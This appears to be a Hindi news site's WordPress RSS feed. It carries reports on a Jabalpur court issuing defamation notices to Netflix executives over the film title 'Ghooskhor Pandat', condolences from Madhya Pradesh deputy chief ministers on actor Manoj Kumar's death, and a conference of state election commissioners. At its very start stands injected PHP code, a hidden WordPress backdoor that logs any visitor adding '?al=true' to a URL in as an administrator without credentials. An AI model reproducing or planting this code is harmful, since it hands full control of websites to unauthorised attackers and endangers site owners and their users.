// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); manoj – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 24 Feb 2026 08:08:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 घूसखोर पंडित पर नोटिस: नेटफ्लिक्स और निर्माता-निर्देशकों पर वैभव पाठक का आरोप https://pratyushaashakinayikiran.com/?p=200330 Tue, 24 Feb 2026 08:08:00 +0000 https://pratyushaashakinayikiran.com/?p=200330 जबलपुर

मनोज बाजपेयी की फिल्म ‘घूसखोर पंडत' को लेकर विवाद थमने का नाम नहीं ले रहा. नाम बदलने के बाद भी मामला अदालत तक पहुंच चुका है और अब इससे जुड़ी कानूनी कार्रवाई और सख्त हो गई है. जबलपुर जिला न्यायालय ने परिवाद पर सुनवाई करते हुए फिल्म के निर्माता‑निर्देशक नीरज पांडे के साथ‑साथ Netflix के कई शीर्ष अधिकारियों को नोटिस जारी करने के निर्देश दिए हैं. समाज के एक वर्ग की भावना आहत होने का आरोप लगाते हुए परिवादी ने इस मामले को गंभीर सांस्कृतिक और सामाजिक मुद्दा बताया है.

अदालत में दर्ज हुआ परिवादी का बयान

जबलपुर के प्रथम श्रेणी न्यायिक दंडाधिकारी पंकज सविता की अदालत में सोमवार को परिवादी वैभव पाठक का बयान दर्ज किया गया. उन्होंने फिल्म के विवादित शीर्षक का विरोध करते हुए इसे ब्राह्मण समुदाय की गरिमा पर प्रहार बताया. अदालत ने बयान सुनने के बाद फिल्म के निर्माता‑निर्देशक सहित Netflix के संबंधित अधिकारियों को नोटिस जारी करने के निर्देश दिए.

Netflix के शीर्ष अधिकारियों को नोटिस

नोटिस जिन लोगों को भेजा गया है, उनमें Netflix (USA) के अध्यक्ष रीड हेस्टिंग्स, सह‑मुख्य कार्यकारी अधिकारी टेड सरंदास, मुख्य सामग्री अधिकारी बेला बजरिया और Netflix इंडिया की उपाध्यक्ष मोनिका शेरगिल शामिल हैं. अदालत ने इन सभी से इस मामले में जवाब माँगने के निर्देश दिए हैं.

परिवाद में रीड हेस्टिंग्स (अध्यक्ष, नेटफ्लिक्स यूएसए), टेड सरंदास (सह-मुख्य कार्यकारी अधिकारी, नेटफ्लिक्स यूएसए), बेला बजरिया (मुख्य सामग्री अधिकारी, नेटफ्लिक्स यूएसए) और नेटफ्लिक्स की भारतीय वितरक मोनिका शेरगिल को भी पक्षकार बनाया गया है।

अभियुक्तों के विरुद्ध नोटिस जारी करने का आदेश

सोमवार को जेएमएफसी न्यायालय ने परिवादी के बयान दर्ज करने के बाद प्राथमिक दृष्टया आपराधिक मानहानि का मामला पाते हुए पांचों प्रस्तावित अभियुक्तों के विरुद्ध नोटिस जारी करने का आदेश पारित किया। न्यायिक दंडाधिकारी प्रथम श्रेणी पंकज सविता ने यह आदेश परिवादी पं. वैभव पाठक के शपथ-पत्र और प्रस्तुत साक्ष्यों के आधार पर दिया।

परिवादी पं. वैभव पाठक (मध्य प्रदेश प्रगतिशील ब्राह्मण महासभा के सक्रिय सदस्य) ने अदालत को बताया कि फिल्म के शीर्षक में प्रयुक्त शब्दों से ब्राह्मण समुदाय की सामाजिक गरिमा को ठेस पहुंची है। उनका कहना है कि ‘पंडित’ शब्द भारतीय संस्कृति में विद्या, वैदुष्य और धार्मिक पवित्रता का प्रतीक रहा है, ऐसे में इसे ‘घूसखोर’ जैसे शब्द के साथ जोड़ना पूरे समुदाय की छवि को धूमिल करने का प्रयास है।

प्रचार-प्रसार से हुई सामाजिक क्षति

परिवादी की ओर से अधिवक्ता असीम त्रिवेदी ने तर्क रखा कि भले ही सर्वोच्च न्यायालय के आदेश के बाद फिल्म का शीर्षक बदला जा रहा हो, लेकिन पहले किए गए व्यापक प्रचार-प्रसार से जो सामाजिक क्षति हुई है, वह अपरिवर्तनीय है। इसलिए संबंधित व्यक्तियों को विधि सम्मत जवाबदेह ठहराया जाना आवश्यक है।

पंडित शब्द को नकारात्मक विशेषण के साथ जोड़ा

पं. वैभव पाठक ने अदालत के समक्ष कहा कि यह मामला केवल एक फिल्म के शीर्षक का नहीं, बल्कि सांस्कृतिक पहचान और सामाजिक अस्मिता का प्रश्न है। उन्होंने उदाहरण देते हुए कहा कि ‘पंडित’ उपाधि को जवाहरलाल नेहरू और अटल बिहारी वाजपेयी जैसी विभूतियों ने गौरवान्वित किया है, ऐसे शब्द को नकारात्मक विशेषण के साथ जोड़ना भारतीय परंपरा का अपमान है।

अब इस मामले में नोटिस जारी होने के बाद सभी पक्षों को अदालत में उपस्थित होकर अपना पक्ष रखना होगा। प्रकरण की अगली सुनवाई की तिथि शीघ्र निर्धारित की जाएगी।

परिवादी की दलील: भावनाएं आहत 

परिवादी की ओर से अधिवक्ता असीम त्रिवेदी ने अदालत में कहा कि भले ही शीर्षक बदलने की प्रक्रिया चल रही है, लेकिन फिल्म के पहले किए गए प्रचार‑प्रसार ने समाज के एक बड़े वर्ग को चोट पहुंचाई है. उनका कहना है कि इससे ब्राह्मण समुदाय की प्रतिष्ठा को नुकसान हुआ है, जो केवल नाम बदल देने से भरपाई नहीं हो सकता.

"पंडित" शब्द के इस्तेमाल पर आपत्ति

परिवाद में यह भी तर्क दिया गया कि “पंडित” शब्द भारतीय संस्कृति में विद्वता, ज्ञान और धार्मिक प्रतिष्ठा से जुड़ा है. इसे “घूसखोर” जैसे नकारात्मक शब्द के साथ जोड़ना न केवल एक काल्पनिक चरित्र का चित्रण है, बल्कि पूरे समुदाय की सामाजिक छवि को प्रभावित करता है. परिवादी ने यह भी कहा कि यह मामला सिर्फ एक शीर्षक का नहीं, बल्कि सामाजिक पहचान और सम्मान से जुड़ा प्रश्न है.
राष्ट्रीय हस्तियों का उल्लेख भी आया सामने

याचिका में कहा गया कि “पंडित” शब्द को देश की प्रमुख हस्तियों पंडित जवाहरलाल नेहरू और पंडित अटल बिहारी वाजपेयी ने सम्मान दिया है. ऐसे में इस शब्द को विवादित संदर्भ से जोड़ना भारतीय परंपरा और मूल्यों के खिलाफ है. अदालत जल्द ही इस मामले की अगली सुनवाई की तारीख निर्धारित करेगी. नोटिस जारी होने के बाद अब फिल्म निर्माताओं और Netflix की ओर से जवाब दर्ज होने की प्रतीक्षा की जा रही है.

 

]]>
देशभक्ति की भावना को जन-जन तक पहुँचाने वाली महान आवाज़ हो गई मौन: उप मुख्यमंत्री देवड़ा https://pratyushaashakinayikiran.com/?p=145948 Fri, 04 Apr 2025 08:26:00 +0000 https://pratyushaashakinayikiran.com/?p=145948 देशभक्ति की भावना को जन-जन तक पहुँचाने वाली महान आवाज़ हो गई मौन: उप मुख्यमंत्री देवड़ा

अभिनेता मनोज कुमार के निधन पर व्यक्त किया शोक

भोपाल

प्रसिद्ध अभिनेता, निर्माता और निर्देशक श्री मनोज कुमार के निधन पर उप मुख्यमंत्री श्री जगदीश देवड़ा ने गहन शोक व्यक्त किया है। उन्होंने कहा कि श्री मनोज कुमार का भारतीय सिनेमा में योगदान अविस्मरणीय है। उनकी फिल्मों ने देशवासियों में राष्ट्रप्रेम और सामाजिक चेतना की अलख जगाई। उन्होंने भारतीय मूल्यों, संस्कृति और देशभक्ति को अभिव्यक्त किया, जिसके लिए उनका सदैव स्मरण किया जाएगा।

उप मुख्यमंत्री श्री देवड़ा ने कहा कि स्व. मनोज कुमार केवल एक अभिनेता नहीं थे, बल्कि भारतीय सिनेमा में राष्ट्रीय चेतना के प्रतीक थे। उनकी फिल्मों ने देश की भावनाओं को सशक्त अभिव्यक्ति दी और समाज को प्रेरित किया। उनका निधन सिनेमा और कला जगत के लिए अपूरणीय क्षति है। उप मुख्यमंत्री श्री देवड़ा ने दिवंगत आत्मा को शांति प्रदान करने और उनके परिजन, प्रशंसकों को इस कठिन समय को सहन करने की शक्ति प्रदान करने की ईश्वर से प्रार्थना की है।

 

]]>
अभिनेता मनोज कुमार के निधन पर उप मुख्यमंत्री श्री शुक्ल ने व्यक्त किया शोक https://pratyushaashakinayikiran.com/?p=145954 Fri, 04 Apr 2025 08:19:00 +0000 https://pratyushaashakinayikiran.com/?p=145954 भोपाल

उप मुख्यमंत्री राजेन्द्र शुक्ल ने भारत के सिनेमा जगत को राष्ट्रीय चेतना और देशभक्ति की भावना से ओतप्रोत करने वाले महान अभिनेता, निर्माता-निर्देशक श्री मनोज कुमार के निधन पर गहन शोक व्यक्त किया है। उप मुख्यमंत्री श्री शुक्ल ने कहा कि भारत की बात सुनाने वाली आवाज़ आज खामोश हो गई। उन्होंने कहा कि श्री मनोज कुमार का निधन भारतीय सिनेमा जगत के लिए अपूरणीय क्षति है। उन्होंने अपने फिल्मों के माध्यम से देशभक्ति, संस्कृति और जन चेतना को नई ऊँचाइयाँ दीं। ‘उपकार’, ‘पूरब और पश्चिम’, ‘क्रांति’ जैसी कालजयी फिल्मों से उन्होंने हर भारतीय के हृदय में देश के प्रति गर्व और सम्मान का भाव जगाया। वे वास्तव में ‘भारत कुमार’ थे।

उप मुख्यमंत्री श्री शुक्ल ने कहा कि स्व. मनोज कुमार न केवल एक महान कलाकार थे, बल्कि एक विचारक और सच्चे राष्ट्रवादी भी थे। उनका जाना सिनेमा जगत के एक युग का अंत है। उप मुख्यमंत्री श्री शुक्ल ने दिवंगत आत्मा को अपने श्रीचरणों में स्थान देने और शोकाकुल परिजनों, प्रशंसकों तथा देशवासियों को इस अपार दुःख को सहने की शक्ति प्रदान करने की ईश्वर से प्रार्थना की है।

 

]]>
राज्य निर्वाचन आयुक्तों की 31वीं वार्षिक कॉन्फ्रेंस सिवनी में एक से 4 मार्च तक https://pratyushaashakinayikiran.com/?p=129507 Thu, 06 Feb 2025 04:06:00 +0000 https://pratyushaashakinayikiran.com/?p=129507 भोपाल

राज्य निर्वाचन आयुक्त  मनोज श्रीवास्तव ने बताया हैकि विभिन्न राज्यों के राज्य निर्वाचन आयुक्तों की 31वीं वार्षिक कॉन्फ्रेंस पेंच जिला सिवनी में एक से 4 मार्च तक आयोजित की जायेगी। इस कॉन्फ्रेंस में लगभग 25 राज्यों के राज्य निर्वाचन आयुक्त शामिल होंगे।

राज्य निर्वाचन आयुक्त श्रीवास्तव ने बताया है कि कॉन्फ्रेंस में विभिन्न राज्यों के राज्य निर्वाचन आयुक्त स्थनीय निकायों के निर्वाचन के दौरान आयीं चुनौतियों तथा उनसे निपटने के उपायों पर चर्चा करेंगे। साथ ही नवाचारों और सुधारों से भी अवगत करायेंगे। इस दौरान स्थानीय निकायों के निर्वाचन में नई तकनीकों के उपयोग पर भी चर्चा होगी।

 

]]>